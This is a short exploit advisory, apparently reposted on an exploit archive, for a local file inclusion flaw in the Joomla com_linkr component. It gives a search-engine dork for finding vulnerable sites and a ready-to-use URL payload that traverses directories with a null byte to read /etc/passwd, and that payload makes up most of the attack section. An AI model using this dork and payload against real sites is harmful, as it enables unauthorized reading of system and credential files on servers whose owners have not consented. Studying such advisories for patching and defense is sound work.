id: 11302
date: 03/15/2010
title: Joomla Component com_linkr - Local File Inclusion Vulnerability
author: Palante
cves: 

===============================================================
Joomla Component com_linkr - Local File Inclusion Vulnerability
===============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_linkr
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_linkr"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_linkr&controller=[LFI]
www.site.com/index.php?option=com_linkr&controller=../../../../../../../../../../etc/passwd%00
 
####################################################################



#  0day.today [2023-03-26]  #